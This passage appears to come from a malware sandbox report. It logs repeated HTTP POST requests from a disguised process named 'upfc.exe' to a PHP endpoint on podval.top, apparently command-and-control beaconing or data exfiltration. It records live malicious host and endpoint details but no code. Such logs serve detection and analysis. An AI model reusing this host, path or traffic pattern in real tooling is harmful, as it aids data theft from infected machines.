                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6Yptna9PmFDbDoxjF4CNnaBLLfaIA5abdsQNPlOaThBLCbOcrxf3%2B%2BZ4Cj7ZzdIZVlLJ1PI%2BjdPe6PAWQsxcLfR6gTiERn%2F9JSYno%2BQygISjEYFvRtobnhALT%2FOT"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5574b7a7cb2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:43:06.886022091 CEST  270                OUT        POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1792
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:06.980633974 CEST  25                 IN         HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:06.980860949 CEST  1792               OUT        (encoded request body)
                                                    Jul 3, 2024 16:43:07.326455116 CEST  729                IN         HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:07 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1oXnMaQMVdZa7%2B3A7Usqe%2Be1AKh%2BYWJ5LSTiOtt2ORyi1a4C8ub6MeU1oXz5EpQ205ZelvTgZrycY3GXPsTftgkvPyJZAoYUdmqLiKMeLf5bRFx9aif8lwgGHtTC"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5605da27cb2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:43:08.345185995 CEST  270                OUT        POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1792
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:08.440224886 CEST 25 IN HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:08.440429926 CEST 1792 OUT
                                                    Jul 3, 2024 16:43:08.778057098 CEST 725 IN HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:08 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VTnQnMMkKKzxlm23wj4tue%2FiKJGf5c1agtXa0bD8op2ee4lPTsIXmN5xERc4FmVb7BcoXtQYOVmMqtyGnbY0otVMekKSu9pUuB7VXiA6uKqG87w4dm7KUx4e7nag"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5697f727cb2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:43:09.792803049 CEST 270 OUT POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:09.887660027 CEST 25 IN HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:09.887831926 CEST 1772 OUT
                                                    Jul 3, 2024 16:43:10.223191977 CEST 729 IN HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:10 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=67WZ7Hwez4blkMXHTe6fIiR%2FHzCYwJf0c0CZWvLZ5SnliWpbajmjMuKCpV2b8oGic7fTyc52jq9p%2F%2FVdSHzXpOTXlwP8u1FoPdZifVKrDmrxoTAuOSdSog90pWUZ"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a57289c77cb2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:43:11.229513884 CEST 270 OUT POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1744
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:11.327704906 CEST 25 IN HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:11.328689098 CEST 1744 OUT
                                                    Jul 3, 2024 16:43:11.621368885 CEST 737 IN HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:11 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BV%2B46%2FCP4STaVsmQF0hwVYq%2BexqPim1v3FK4TchDZMI%2FESP8XZBw3YjS9w66SyWhG6Pgz3o1vhHQKVqQuwPArc%2Fuxzs0DW6X%2FWDuG3CVa42S9rDztbOZhpRPRU0k"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a57b7ca47cb2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:43:12.636010885 CEST 270 OUT POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1792
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:12.731632948 CEST 25 IN HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:13.067936897 CEST 729 IN HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:13 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5pFQcBkMTFZPO8Ow0C81dfm9wnQAVMDBUnZWneMq0YCa4hNsifw1u3zYKVR%2BXiTrOTsnQqZX%2FWodZu6jMBdol2X6G6SssPWY0miDKvc3qdXCgET6%2BnM8gjAxEWB9"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5844df87cb2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:43:14.073318005 CEST 270 OUT POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1792
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:14.168092966 CEST 25 IN HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:14.501064062 CEST 733 IN HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:14 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KLJsmCU9iDMvHGDi%2FO5jRbHHKgRUCpRi86U%2FrnwC6mWTsW3qyqiyUvaix%2B7VOZh9505qDDCCJeaaA66%2Fq46yrxuYw54QYesuZxjRjjY6cLFr%2BqmNxF0JBVJcVTYG"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a58d4fba7cb2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:43:15.512069941 CEST 270 OUT POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1792
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:15.611356974 CEST 25 IN HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:15.950858116 CEST 724 IN HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:15 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wUpwbbXchEX%2BfzmP7w7rFtUtA8KB18SDPFGpsiE1puN2mgm2JNpbNThAX7SgEP2Q2XL2N7u8JdG7xXH9c%2FL6kHabcIlZCznXyOPK72wf2hUMa4%2FdAyn0JimenjXC"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a59649ad7cb2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:43:17.088772058 CEST 270 OUT POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1792
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:17.183898926 CEST 25 IN HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:17.521200895 CEST 731 IN HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:17 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zTBknzdhqx0hClSD%2BTjhc4AhedhR37tWQPc0E0N%2BXesxtdq2bmkLBYwysHZNWhKBrRvWbiq2m6pIqMuhGfY1k2%2BgNfvtylsOMM4cmEGQ9OVMXMS86yiIAWp%2FyJg5"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5a01d917cb2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:43:18.526547909 CEST 270 OUT POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1792
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:18.666819096 CEST 25 IN HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:19.165853024 CEST 731 IN HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:19 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RqxUGcEu%2BLNWYyOUQqLFLgXXMjyHodjsVeqLuTpCgbYVT0jGOH0v3n%2FqqDz3uvCw7e8fgeDC8l3M%2BdhpP8vFsixikvqqwdGZA8YD0%2F0ol1QFaxFJVZ3YBdAn8MOF"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5a93fd37cb2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:43:20.171363115 CEST 270 OUT POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1792
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:20.272322893 CEST 25 IN HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:20.653573036 CEST 729 IN HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:20 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mSY6JRVUiCXKoa948vC%2Fx0r58efCUnapMOx%2F05bvml6FQ9Nx127VxV%2Fy8fVaOTQa6CP4DyeN3mJIMoAOp7AER6Ar6Z29a0w5Q02uhecApX5kSMo21rrd0DZorBHk"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5b36b047cb2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:43:21.667474031 CEST 270 OUT POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1792
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:21.761843920 CEST 25 IN HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:22.102695942 CEST 729 IN HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:22 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hflJuVRMcfHBvX%2FCBYftUEfufKdHBXSj0xcQmMdpOPw%2BkFbBF8FFWA2TAE62B4XSy7wWAy1Js79AayEahxBnAWH2QH7BPYb0pB%2Bnm9TDhhPmptkqEbYLNV0lusoF"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5bcbcef7cb2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:43:23.104619980 CEST 270 OUT POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1792
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:23.199186087 CEST 25 IN HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:23.548437119 CEST 724 IN HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:23 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mVgKbCGpzej4svb05tczry6NarZIo%2Fu8vdLftrhituXhIOf5UgaKxlqM1Ng%2FIEUq%2BdCj1rCsIbmytU96Zyfwy5XVv24nQl5ViJihEShUH9LuRQEty4lociu9jaQO"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5c5be7e7cb2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:43:24.683429003 CEST 270 OUT POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1792
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:24.780395985 CEST 25 IN HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:25.071371078 CEST 731 IN HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:25 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gtEJxUpRFxX%2BFcXas6GsrTeAUmHL7BNXd9W9ZZXiQCwBO9tLa9FMEEhoOz665VysXBdurNQqdBYVewfTcsNB8qVeCehvP6zfGq1%2FNy2sWGDzZAD%2Boy4aVeqEUxG%2F"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5cf99377cb2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:43:26.073241949 CEST | 270 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:26.337582111 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:26.674227953 CEST | 737 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:26 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7Pr66bOduS0lsrF1M2mgPFPB6xOg81G3Oexttz5LFxjYc9SDXvQ7qH92v4Z%2BMN%2BvrCls1SjKVZopj6Fe890XPqU%2BCGA%2BHVpxF%2FsxsGCuLBSiuUF%2FEwVnhV%2BtfZO4"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5d95cde7cb2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:43:27.686592102 CEST | 270 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:27.782900095 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:28.074255943 CEST | 733 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:28 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dL3JsC%2FqmzCLvdvcIo8Myh19xMnBu5RcuRjMYF%2BaQj0Kt6xXaP%2FkXpZBddu8MXcrmTu8qCogIsbLuD0JV6p%2FtCa9G8ssFre5Hwa6RiLgE%2FAoklPYlpqsvlItQAgd"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5e25fe87cb2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:43:29.088962078 CEST | 270 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:29.184120893 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:29.522166014 CEST | 733 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:29 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FtpC1OzM3nzkBwz5hKmQG%2FJ4dVbBGtBENlt2CMy%2F2r%2BSwcCd%2FiFYCRGQmRofPrzEsXlzVM73zLiMXSOMpJdeqMAELOmhT%2Fb7D0Sd1lGad3DrqIKIPqK1OJ4Kx65x"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5eb1a687cb2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:43:30.526822090 CEST | 270 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1792
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:30.621807098 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:30.923676014 CEST | 793 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:30 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T9SNz78Ey02TytSt6NlTw26I%2FruUFlDaF9v7M2QoEyftKtG0hzkkaebGQm5Mm9L7C3zye9P4KGlWDA6QpG984BDBJeX3yfBHfuw70s9ipP56R0Em9WusnIisP8M7"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5f41cd47cb2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:43:31.003087044 CEST | 269 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 500
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:31.097474098 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:31.390216112 CEST | 584 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:31 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zyyLlEp%2BxcZOrCmIqXiSlzkfkjC9TdbCfbQMCZ7MFvO5vSty0y91iAONN4nCnZSUqX4CdrQPBVILa8Xov0K%2F7NnCeRo%2Ftg8rbvxwQe%2ByoCvQz3%2B3qx0O0TsSgf4I"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5f718467cb2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    68 | 192.168.2.10 | 49786 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:03.091326952 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:03.497622013 CEST | 1060 | OUT
                                                    Jul 3, 2024 16:43:03.570642948 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:03.792402029 CEST | 580 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:03 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kjlNEvBoZZ9psscpN3gDgvBWIyd%2FHrQO17cVXUup7bDie2g%2F90yK5ane0L1slv%2Bb5Hd57UMBzIQSPzfMzzF5RuxHSWQkE79WAru9qzcpDyWXsY6MP9l5pWV4N2tF"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a54b0fa14399-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                    69 | 192.168.2.10 | 49787 | 188.114.97.3 | 80
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:03.721242905 CEST | 270 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1080
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:04.072758913 CEST | 1080 | OUT
                                                    Jul 3, 2024 16:43:04.188453913 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:04.544120073 CEST | 580 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:04 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mvnawe8rXYNqd7bQ%2BVhnDrJrgwcA4Sz%2Bu%2Bdc0XLVNjzZFQ6eSaRyNb5z8RfzuvcHJiWN83DDYa2FNH6xRj7qd5ifcRHTFPXOem3eYOVwvzEN5UTZ1HpOmGFnaoJg"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a54eda6b78d9-EWR
                                                    alt-svc: h2=":443"; ma=60
